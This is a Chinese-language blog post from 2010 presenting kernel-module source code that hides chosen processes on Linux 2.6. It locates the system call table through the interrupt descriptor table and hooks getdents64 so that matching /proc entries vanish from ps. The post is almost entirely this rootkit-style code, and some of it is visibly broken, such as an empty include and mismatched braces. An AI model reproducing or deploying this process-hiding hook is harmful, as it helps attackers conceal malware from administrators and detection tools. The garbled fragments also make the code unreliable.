在Linux 2.6内核下实现进程隐藏-jiuzhuaxiong-ChinaUnix博客

jiuzhuaxiong

首页　| 　博文目录　| 　关于我

jiuzhuaxiong

博客访问： 1969362
博文数量： 610
博客积分： 11499
博客等级：上将
技术积分： 5511
用户组：普通用户
注册时间： 2008-03-12 19:27

文章分类

全部博文（610）

am335x-linux（33）
指令集以及汇编程（3）

Mips（0）

avr32（0）

MCS51（0）

Powerpc（0）

ARM（1）
FREEBSD（0）

安装指导（0）
深入Windows开发（0）
深入.NET开发（0）

NUnit（0）
深入DSP开发技术（4）

282xx（0）

2833X（0）

bios（0）

ucos（0）

2812（3）

CMD file（0）
深入理解GDB调试（8）

kgdb（6）
深入理解shell（2）
深入理解perl（0）
深入理解JAVA（1）
深入android开发（8）
RT-RTHREAD（0）
UCOS II/III（0）
深入linux内核开（24）

buddy算法（0）

内存管理（0）
数据库（0）

ORCALE（0）

IBM DB2（0）

mysql（0）

sqlite（0）
协议栈（4）

SSL（0）

61850（0）

SNMP（0）

HTTP（1）

BACNET（0）

TCP/IP（3）
深入linux驱动技（5）

SPI（0）

I2C（0）

PCI驱动（0）

触摸屏（0）

ATA/IDE（0）

TTY驱动（0）

CAN（0）

串口/485（0）

LCD（0）

USB驱动技术（5）
linux frame buff（0）
电源设计（3）

滤波器设计（1）
版本控制（1）
深入程序算法（2）
深入linux应用程（22）

linux内存管理（5）

linux 进程间通信（14）
数据结构（6）

排序算法（0）

常用数据结构（6）
MIPS-LINUX（1）
编码（2）
arm-linux编译器（0）
linux SHELL编程（7）
使用curses管理基（1）
linux 数据管理（8）
LINUX 调试（6）
linux 进程与信号（5）
linux 多线程编程（6）
linux shell学习（5）
linux socket 学（25）
TCP IP 网络协议（2）
嵌入式VXWORKS开（1）

VXWORKS BSP开发（0）

VXWORKS启动过程（0）

VXWORKS多任务机（0）

VXWORKS在AT91RM9（0）

VXWORKS在MPC860（0）
前辈经验（2）
C语言技巧讨论（12）
嵌入式LINUX开发（160）

linux块设备驱动（3）

深入linux驱动开（3）

深入linux网络开（2）

深入linux内核（32）

linux中断分析（16）

内核跟文件系统合（0）

Image启动（0）

ulmage启动（0）

bootpImage启动（0）

zImage启动（0）

linux内核启动方（0）

LINUX 网卡驱动（1）

LCD 驱动开发（2）

QT 4开发（3）

LINUX驱动开发笔（1）

LINUX内核移植（0）

S2C2410LINUX2.6.（0）

AT9200 LINUX2.6.（19）

SHELL命令学习（4）

U-BOOT POWERPC移（0）

UCLINUX开发笔记（0）

AT91RM9200开发笔（12）

AVR在LINUX平台下（1）

MAKEFILE制作（2）

ARM嵌入式开发（2）

LINUX系统启动（9）

RAMDISK系统的制（6）

JFFS2文件系统制（4）

LINUX交叉编译器（4）

U-BOOT移植（7）
未分配的博文（241）

文章存档

2016年（5）

2015年（18）

2014年（12）

2013年（16）

2012年（297）

2011年（45）

2010年（37）

2009年（79）

2008年（101）

我的朋友

相关博文

在Linux 2.6内核下实现进程隐藏

分类： LINUX

2010-06-13 10:11:09

很早以前的小程序，比较简单但是觉得有趣

　　原理很简单，Linux查看进程的命令ps是通过系统调用sys_getdents实现，sys_getdents用户获取一个指定路径下的目录条目，实际上就是枚举

　　/proc/　下的pid，这样我们只需要hook一下sys_getdents，把相应的要隐藏的pid信息去掉即可。

　　以下是LKM代码，在Linux-2.6.14并运行成功

　　#include

　　#define CALLOFF 100

　　//使用模块参数来定义需要隐藏的进程名

　　char *processname;

　　module_param(processname, charp, 0);

　　struct {

　　unsigned short limit;

　　unsigned int base;

　　} __attribute__ ((packed)) idtr;

　　struct {

　　unsigned short off1;

　　unsigned short sel;

　　unsigned char none,

　　flags;

　　unsigned short off2;

　　} __attribute__ ((packed)) * idt;

　　void** sys_call_table;

　　asmlinkage long (*orig_getdents)(unsigned int fd, struct linux_dirent64 __user *dirp, unsigned int count);

　　char * findoffset(char *start)

　　{

　　char *p;

　　for (p = start; p < start + CALLOFF; p++)

　　if (*(p + 0) == '\xff' && *(p + 1) == '\x14' && *(p + 2) == '\x85')

　　return p;

　　return NULL;

　　}

　　int myatoi(char *str)

　　{

　　int res = 0;

　　int mul = 1;

　　char *ptr;

　　for (ptr = str + strlen(str) - 1; ptr >= str; ptr--) {

　　if (*ptr < '0' || *ptr > '9')

　　return (-1);

　　res += (*ptr - '0') * mul;

　　mul *= 10;

　　}

　　return (res);

　　}

　　struct task_struct *get_task(pid_t pid)

　　{

　　struct task_struct *p = get_current(),*entry=NULL;

　　list_for_each_entry(entry,&(p->tasks),tasks)

　　{

　　if(entry->pid == pid)

　　{

　　printk("pid found\n");

　　return entry;

　　}

　　return NULL;

　　}

　　static inline char *get_name(struct task_struct *p, char *buf)

　　{

　　int i;

　　char *name;

　　name = p->comm;

　　i = sizeof(p->comm);

　　do {

　　unsigned char c = *name;

　　name++;

　　i--;

　　*buf = c;

　　if (!c)

　　break;

　　if (c == '\\') {

　　buf[1] = c;

　　buf += 2;

　　continue;

　　}

　　if (c == '\n') {

　　buf[0] = '\\';

　　buf[1] = 'n';

　　buf += 2;

　　continue;

　　}

　　buf++;

　　}

　　while (i);

　　*buf = '\n';

　　return buf + 1;

　　}

　int get_process(pid_t pid)

　　{

　　struct task_struct *task = get_task(pid);

　　char *buffer[64] = {0};

　　if (task)

　　{

　　get_name(task, buffer);

　　if(strstr(buffer,processname))

　　return 1;

　　else

　　return 0;

　　}

　　else

　　return 0;

　　}

　　asmlinkage long hacked_getdents(unsigned int fd, struct linux_dirent64 __user *dirp, unsigned int count)

　　{

　　//added by lsc for process

　　long value;

　　struct inode *dinode;

　　int len = 0;

　　int tlen = 0;

　　struct linux_dirent64 *mydir = NULL;

　　//end

　　//在这里调用一下sys_getdents,得到返回的结果

　　value = (*orig_getdents) (fd, dirp, count);

　　tlen = value;

　　//遍历得到的目录列表

　　while(tlen > 0)

　　{

　　len = dirp->d_reclen;

　　tlen = tlen - len;

　　printk("%s\n",dirp->d_name);

　　//在proc文件系统中，目录名就是pid,我们再根据pid找到进程名

　　if(get_process(myatoi(dirp->d_name)) )

　　{

　　printk("find process\n");

　　//发现匹配的进程，调用memmove将这条进程覆盖掉

　　memmove(dirp, (char *) dirp + dirp->d_reclen, tlen);

　　value = value - len;

　　}

　　if(tlen)

　　dirp = (struct linux_dirent64 *) ((char *)dirp + dirp->d_reclen);

　　}

　　return value;

　　}

　　void **get_sct_addr(void)

　　{

　　unsigned sys_call_off;

　　unsigned sct = 0;

　　char *p;

　　asm("sidt %0":"=m"(idtr));

　　idt = (void *) (idtr.base + 8 * 0x80);

　　sys_call_off = (idt->off2 << 16) | idt->off1;

　　if ((p = findoffset((char *) sys_call_off)))

　　sct = *(unsigned *) (p + 3);

　　return ((void **)sct);

　　}

　　static void filter_exit(void)

　　{

　　if (sys_call_table)

　　sys_call_table[__NR_getdents64] = orig_getdents;

　　}

　　static int filter_init(void)

　　{

　　//得到sys_call_table的偏移地址

　　sys_call_table = get_sct_addr();

　　if (!sys_call_table) {

　　printk("get_act_addr(): NULL...\n");

　　return 0;

　　} else

　　printk("sct: 0x%x\n", (unsigned int)sys_call_table);

　　//将sys_call_table中注册的系统调用sys_getdents替换成我们自己的函数hack_getdents

　　orig_getdents = sys_call_table[__NR_getdents64];

　　sys_call_table[__NR_getdents64] = hacked_getdents;

　　return 0;

　　}

　　module_init(filter_init);

　　module_exit(filter_exit);

　　MODULE_LICENSE("GPL");

阅读(1696) | 评论(0) | 转发(0) |

上一篇：对Linux内核中进程上下文和中断上下文的理解

下一篇：Linux tasklet 分析笔记

给主人留下些什么吧！~~

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6